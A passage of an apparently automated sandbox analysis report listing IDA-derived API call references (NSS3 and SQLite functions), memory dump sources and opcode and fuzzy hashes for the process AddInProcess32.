                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initialize
                                                                                      • String ID:
                                                                                      • API String ID: 605967206-0
                                                                                      • Opcode ID: cfb18b7360c776b36433eff0692b898abcd0a005a1e9c4a270bbd691f2f2b700
                                                                                      • Instruction ID: 20593ca8332a60c985037289f6f8419f9d45e7eea9c10f0e518d843ad70866a3
                                                                                      • Opcode Fuzzy Hash: cfb18b7360c776b36433eff0692b898abcd0a005a1e9c4a270bbd691f2f2b700
                                                                                      • Instruction Fuzzy Hash: D441BE71A00706DFDB20CFA9C880E5677F5FF45319B20892EE896ABA50F731E815CB51
                                                                                      APIs
                                                                                      • CERT_FreeNicknames.NSS3(00000000,00000000,00000000,00000000,?,?,?,?,000000D4,?,6CD244C1,00000000), ref: 6CD24D84
                                                                                      • memset.VCRUNTIME140(6CD265A5,00000000,00002010,?,00000000,000000D4,?,6CD244C1,00000000), ref: 6CD24DC0
                                                                                      • CERT_FreeNicknames.NSS3(00000000,?,?,?,?,?,?,?,000000D4,?,6CD244C1,00000000), ref: 6CD24DE8
                                                                                      • memset.VCRUNTIME140(6CD265A5,00000000,00002010,000000D4,?,6CD244C1,00000000), ref: 6CD24DFC
                                                                                        • Part of subcall function 6CD25C97: SECOID_FindOID_Util.NSS3(?,?,?,6CD25CFD,?,00000000,00000000,?,?,?,?,6CD2123E,?), ref: 6CD25CA8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeNicknamesmemset$FindUtil
                                                                                      • String ID:
                                                                                      • API String ID: 2326607731-0
                                                                                      • Opcode ID: 7737cf7ac04c4c618756e3ef7e26ff6c65059de20326575da66b6a10b8bdc37a
                                                                                      • Instruction ID: 02f7e8b5f22aa715e18d616785e7d33b9848a7e104389a0e858fa084ca725f39
                                                                                      • Opcode Fuzzy Hash: 7737cf7ac04c4c618756e3ef7e26ff6c65059de20326575da66b6a10b8bdc37a
                                                                                      • Instruction Fuzzy Hash: 3931A0B2600701BBDB119FB4CD84F95B7A8FF04318F514625EB189BA72E739E458CBA0
                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CCA1F05
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CCA1F27
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CCA1F59
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CCA1F90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID:
                                                                                      • API String ID: 885266447-0
                                                                                      • Opcode ID: f28451e1a75a74126ad974e4a35e1e5bf96d4bc0a06b821a3f9a6cf7cb2b3d89
                                                                                      • Instruction ID: 467c6317015340488e4eb27489113810148b052ed9000b0079f9db9ff791d7aa
                                                                                      • Opcode Fuzzy Hash: f28451e1a75a74126ad974e4a35e1e5bf96d4bc0a06b821a3f9a6cf7cb2b3d89
                                                                                      • Instruction Fuzzy Hash: F731EA316092C7EADF209EECCC48ADEB695E78D3A8F104729EA1492E50F330C54342B1
                                                                                      APIs
                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000159,?,?,?,?,6CD406DB), ref: 6CD2FD98
                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000146,00000010,?,?,?,?,?,6CD406DB), ref: 6CD2FDD4
                                                                                        • Part of subcall function 6CD1BF5F: PORT_SetError_Util.NSS3(FFFFE005,?,6CCE7010,00000000,00000000,?), ref: 6CD1BF80
                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000146,00000010,?,?,?,?,?,6CD406DB), ref: 6CD2FE07
                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000146,00000010,?,?,?,?,?,6CD406DB), ref: 6CD2FE4B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AlgorithmPolicy$Error_Util
                                                                                      • String ID:
                                                                                      • API String ID: 1361161965-0
                                                                                      • Opcode ID: df3af6f74ec637db84c32eb55809c31cff2952774065fbfe341b7fc6f6cf4b64
                                                                                      • Instruction ID: b77075d0e5cb008e29b49adc094f871c0fbe41eb2ac504a8fabe5a7de0c72ace
                                                                                      • Opcode Fuzzy Hash: df3af6f74ec637db84c32eb55809c31cff2952774065fbfe341b7fc6f6cf4b64
                                                                                      • Instruction Fuzzy Hash: 4B313A72508325FEE7059B75D940FAB73E89F0131CF10099EEB5496AB2EB38DE44C660
                                                                                      APIs
                                                                                        • Part of subcall function 6CD25C97: SECOID_FindOID_Util.NSS3(?,?,?,6CD25CFD,?,00000000,00000000,?,?,?,?,6CD2123E,?), ref: 6CD25CA8
                                                                                      • PK11_FreeSymKey.NSS3(00000000,00000000,?), ref: 6CD26FF2
                                                                                      • PORT_SetError_Util.NSS3(00000000), ref: 6CD27007
                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6CD2703D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeK11_Util$Error_Find
                                                                                      • String ID:
                                                                                      • API String ID: 1801936575-0
                                                                                      • Opcode ID: 51b52ce18132b3ca5ebfb45b1377112a86ef9c2bf8269c7e4bbc5719bb733109
                                                                                      • Instruction ID: 4ee1975a80d39f5138251d225d2486cf61d51d4fb5dd1d26612394928f93216a
                                                                                      • Opcode Fuzzy Hash: 51b52ce18132b3ca5ebfb45b1377112a86ef9c2bf8269c7e4bbc5719bb733109
                                                                                      • Instruction Fuzzy Hash: C031E532209701EFDB24DF69DDC0D6B77F8EF4565C720042EEA54C6E60EB39E4498660
                                                                                      APIs
                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(00000000,?), ref: 6CCE6F27
                                                                                        • Part of subcall function 6CD18C17: SECOID_FindOIDTag_Util.NSS3(?,?,6CCEAD2B,?,?,6CCDD706,?,?,?,?,6CCDDC0B,?,?), ref: 6CD18C28
                                                                                      • NSS_OptionGet.NSS3(00000001,?,?), ref: 6CCE6FAC
                                                                                      • PORT_SetError_Util.NSS3(FFFFE08D,?), ref: 6CCE6FEA
                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000000,00000000,?), ref: 6CCE700B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$AlgorithmTag_$Error_FindOptionPolicy
                                                                                      • String ID:
                                                                                      • API String ID: 3843296053-0
                                                                                      • Opcode ID: 23767e001a26d375a97054c63c7d49c0b713819d220655b33e619ef88edf3225
                                                                                      • Instruction ID: 7b7db9c03f3d3a29a76e5cdbe89a22f4d3b7c883d1b283ad67c0b4fd13807feb
                                                                                      • Opcode Fuzzy Hash: 23767e001a26d375a97054c63c7d49c0b713819d220655b33e619ef88edf3225
                                                                                      • Instruction Fuzzy Hash: 1631E532539D1CA9EF148A58D944B9D3764EB0F33DF304A16E628D6ED1FB21DD898601
                                                                                      APIs
                                                                                      • sqlite3_initialize.NSS3(?), ref: 6CC63E14
                                                                                      • sqlite3_mutex_enter.NSS3(00000000), ref: 6CC63E49
                                                                                      • sqlite3_vfs_find.NSS3(00000000), ref: 6CC63E70
                                                                                      • sqlite3_mutex_leave.NSS3(00000000), ref: 6CC63F4D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_initializesqlite3_mutex_entersqlite3_mutex_leavesqlite3_vfs_find
                                                                                      • String ID:
                                                                                      • API String ID: 847843463-0
                                                                                      • Opcode ID: 6d22edc677f46e8211557e2c25a9f0c2551227dd31bc62bbc7c72c67ab8b06f1
                                                                                      • Instruction ID: 849e858e7de2f4018b4dd55a7863149bb91af76562c275362ff6c8bd47159abe
                                                                                      • Opcode Fuzzy Hash: 6d22edc677f46e8211557e2c25a9f0c2551227dd31bc62bbc7c72c67ab8b06f1
                                                                                      • Instruction Fuzzy Hash: D031EA3151A1D68EDB025F2689909E67F78EF17214F0800DBD7D0D7B43D220454AC7E9
                                                                                      APIs
                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CCE5D84
                                                                                        • Part of subcall function 6CD1CA68: PR_SetError.NSS3(FFFFE013,00000000,?,6CCE3237,00000800,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216,?), ref: 6CD1CA7B
                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6CCE5D99
                                                                                        • Part of subcall function 6CD1C6C7: PR_Lock.NSS3(?,?,00000000,00000000,?,6CCE3248,00000000,00000008,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C6F4
                                                                                        • Part of subcall function 6CD1C6C7: PR_Unlock.NSS3(?,00000000,00000000,?,6CCE3248,00000000,00000008,?,00000000,?,?,6CCDCC16,00000000,?,?,?), ref: 6CD1C732
                                                                                        • Part of subcall function 6CD1C6C7: PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,?,6CCE3248,00000000,00000008,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C77B
                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,?), ref: 6CCE5DD9
                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CCE5E56
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Alloc_ArenaArena_Error$FreeLockUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 310395223-0
                                                                                      • Opcode ID: bcfd6ddf8575dd322d8870f645d6b834d36b27f01eeab949f1c585e2f540b5a1
                                                                                      • Instruction ID: 4656548d7eaf9f5375487455e3417c31e5013dfc97af73ecb4623e71f732d086
                                                                                      • Opcode Fuzzy Hash: bcfd6ddf8575dd322d8870f645d6b834d36b27f01eeab949f1c585e2f540b5a1
                                                                                      • Instruction Fuzzy Hash: 2131F171A087059FEB04CF58D880BAEB7F4EF8A729F20856DD4159BB50E734E905CB50
                                                                                      APIs
                                                                                      • memset.VCRUNTIME140(6CC6292D,00000000,00000030,?,?,?,6CC6292D,?,?,?,?), ref: 6CC8495F
                                                                                      • sqlite3_value_text.NSS3(?), ref: 6CC8499B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memsetsqlite3_value_text
                                                                                      • String ID:
                                                                                      • API String ID: 3637907270-0
                                                                                      • Opcode ID: 29f6bb7b2ccdc34750c0023c483abae005211c64702bf45f4404427ab0a592ef
                                                                                      • Instruction ID: c10e2a3fc6b7a3ba8ac873486e2f08dad24ce07d27415bd161a1eee734fb08d7
                                                                                      • Opcode Fuzzy Hash: 29f6bb7b2ccdc34750c0023c483abae005211c64702bf45f4404427ab0a592ef
                                                                                      • Instruction Fuzzy Hash: D9210432516115BEDB21DF26CC11BAB3F9DEF0125CF20042AF858EAA50FB36D954C7A8
                                                                                      APIs
                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,?,?,6CD3ECDA,00000000,?,?,?,?,?,?,?,6CD3EC4F,?,?), ref: 6CD3EDA8
                                                                                        • Part of subcall function 6CD18C17: SECOID_FindOIDTag_Util.NSS3(?,?,6CCEAD2B,?,?,6CCDD706,?,?,?,?,6CCDDC0B,?,?), ref: 6CD18C28
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,00000000,?,?,6CD3ECDA,00000000,?,?,?,?,?,?,?,6CD3EC4F,?,?), ref: 6CD3EDE4
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013,00000000,?,?,00000000,?,?,6CD3ECDA,00000000,?,?,?,?), ref: 6CD3EE52
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Error_Tag_$AlgorithmFind
                                                                                      • String ID:
                                                                                      • API String ID: 3793835494-0
                                                                                      • Opcode ID: 47660b5e3591c27e8857766e1e565bb0df030d0a0dafe1bb89a287fc3cbc76bf
                                                                                      • Instruction ID: dc45c65c39cf57c8e895ec0391d8622a018bb11f2b2aae3c011796b446f446cf
                                                                                      • Opcode Fuzzy Hash: 47660b5e3591c27e8857766e1e565bb0df030d0a0dafe1bb89a287fc3cbc76bf
                                                                                      • Instruction Fuzzy Hash: 9F21A576409225ABD7018F28E940AEE37A4AF47774F14527AEC1CEAFE0DB35D90096E0
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,00000000,?,?), ref: 6CD3AB1D
                                                                                      • memcpy.VCRUNTIME140(?,?,?,00000000,?,?,00000000,?,?), ref: 6CD3AB38
                                                                                        • Part of subcall function 6CD30B17: PK11_HashBuf.NSS3(00000003,6CD30CC4,6CD37718,00000000,?,?,?,?,6CD30CBC,00000000,6CD37718,00000000,6CD37718), ref: 6CD30B33
                                                                                      • PORT_Free_Util.NSS3(?,?,?,?,?,?,?,00000000,?,?), ref: 6CD3AB6D
                                                                                      • PORT_Alloc_Util.NSS3(?,?,?), ref: 6CD3AB86
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Utilmemcpy$Alloc_Free_HashK11_
                                                                                      • String ID:
                                                                                      • API String ID: 3713911169-0
                                                                                      • Opcode ID: 800584485ea278e16a97b8298b0dcbff11df1ec2bb232ad9d1989d317a3ad42c
                                                                                      • Instruction ID: 616cca954cb4e8949b5db0dba89de099a733d61876f51db2032b3650c57dca41
                                                                                      • Opcode Fuzzy Hash: 800584485ea278e16a97b8298b0dcbff11df1ec2bb232ad9d1989d317a3ad42c
                                                                                      • Instruction Fuzzy Hash: E5312D7290052D9BCF21CF64DC40ADEB7B9EF46368F0541D5E90CAB660DB71AE898F90
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE041), ref: 6CCFBC9D
                                                                                      • PK11_FreeSlotList.NSS3(00000000), ref: 6CCFBCE9
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005), ref: 6CCFBC66
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PORT_SetError_Util.NSS3(FFFFE041,00000000), ref: 6CCFBCF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error_Util$ErrorFreeK11_ListSlot
                                                                                      • String ID:
                                                                                      • API String ID: 2979990043-0
                                                                                      • Opcode ID: aee94ce0d322d408c8471992aa3376365963ff92f23e15c32b9fa084371f448c
                                                                                      • Instruction ID: a6a000d0df105b6f952dc1fdb76637bb67ded97a05409ea1e02fbddcdba8dc80
                                                                                      • Opcode Fuzzy Hash: aee94ce0d322d408c8471992aa3376365963ff92f23e15c32b9fa084371f448c
                                                                                      • Instruction Fuzzy Hash: 42110631A08111AB87419BAAADA099F37B8AF45768724416AF524D7F10FF34C94786E1
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,00000000,00000000,00000000,?,6CD2370F,00000000,00000000,?), ref: 6CD22F79
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • SECOID_FindOIDTag_Util.NSS3(?,00000000,00000000,00000000,?,6CD2370F,00000000,00000000,?), ref: 6CD22F88
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$ErrorError_FindTag_
                                                                                      • String ID:
                                                                                      • API String ID: 3592481120-0
                                                                                      • Opcode ID: dd07a9db6df6a2600a1c5057e9d11fb2f256c2fb3a158f2cd190c67bccd28dc5
                                                                                      • Instruction ID: 8dd839bf76c6d374007af0a6adb05ece8ad589d17a9215cefa06b5d5995c20f9
                                                                                      • Opcode Fuzzy Hash: dd07a9db6df6a2600a1c5057e9d11fb2f256c2fb3a158f2cd190c67bccd28dc5
                                                                                      • Instruction Fuzzy Hash: 3521B331615A00EFD724CF6AD984B9AB3E8EF4537CF200129FA54D7EA0DB38D940CA61
                                                                                      APIs
                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,6CD28C8D,?,?), ref: 6CD0EFDD
                                                                                      • PK11_AlgtagToMechanism.NSS3(00000000,?,?,?,?,6CD28C8D,?,?), ref: 6CD0EFE3
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001,?,?,?,6CD28C8D,?,?), ref: 6CD0F00D
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001,?,?,?,6CD28C8D,?,?), ref: 6CD0F024
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$FreeItem_$AlgorithmAlgtagK11_MechanismTag_
                                                                                      • String ID:
                                                                                      • API String ID: 1163572153-0
                                                                                      • Opcode ID: 188632536bb8bd3d2106fe9cb04745f1d3fb0e481c78f18c69b738e25218af09
                                                                                      • Instruction ID: ffcec15a380daa3a6d8bdf1585e6bfe37e2b8887b57a39598b5025639e442be9
                                                                                      • Opcode Fuzzy Hash: 188632536bb8bd3d2106fe9cb04745f1d3fb0e481c78f18c69b738e25218af09
                                                                                      • Instruction Fuzzy Hash: 45115936B49120E9FA254F1DB841B9D67999B42B38F30041AE9C0DBFF0DE60E88011F9
                                                                                      APIs
                                                                                      • PR_Lock.NSS3(?,?,?,?,6CD1C8EF,?,?,00000000,?,6CD1BA17,?,00000000,?,?,6CCDCB3B,00000000), ref: 6CD1CCB4
                                                                                      • PL_ArenaRelease.NSS3(?,?,6CD1C8EF,?,?,00000000,?,6CD1BA17,?,00000000,?,?,6CCDCB3B,00000000,?,6CCDD2B9), ref: 6CD1CCF0
                                                                                      • PR_Unlock.NSS3(?,6CD1C8EF,?,?,00000000,?,6CD1BA17,?,00000000,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?), ref: 6CD1CCFA
                                                                                        • Part of subcall function 6CD1CD42: memset.VCRUNTIME140(?,00000000,?,?,?,6CD1CD12,?,?,?,?,?,6CD1C8EF,?,?,00000000), ref: 6CD1CD61
                                                                                      • PL_ArenaRelease.NSS3(?,?,?,?,?,6CD1C8EF,?,?,00000000,?,6CD1BA17,?,00000000,?,?,6CCDCB3B), ref: 6CD1CD37
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ArenaRelease$LockUnlockmemset
                                                                                      • String ID:
                                                                                      • API String ID: 3545657586-0
                                                                                      • Opcode ID: eb96022e4859a7bbae822b0eaa3102789311f44629d2fd1ec8d1f1912b2c9e68
                                                                                      • Instruction ID: 9b79bc6c1bb6dde00106cbc23d9a858362b9184da0bbcd6db7c289d906c886e6
                                                                                      • Opcode Fuzzy Hash: eb96022e4859a7bbae822b0eaa3102789311f44629d2fd1ec8d1f1912b2c9e68
                                                                                      • Instruction Fuzzy Hash: B421C33210C216DFD714DF29E84499AFBB5FF81324714862DE0198BE61DB34F845CBA4
                                                                                      APIs
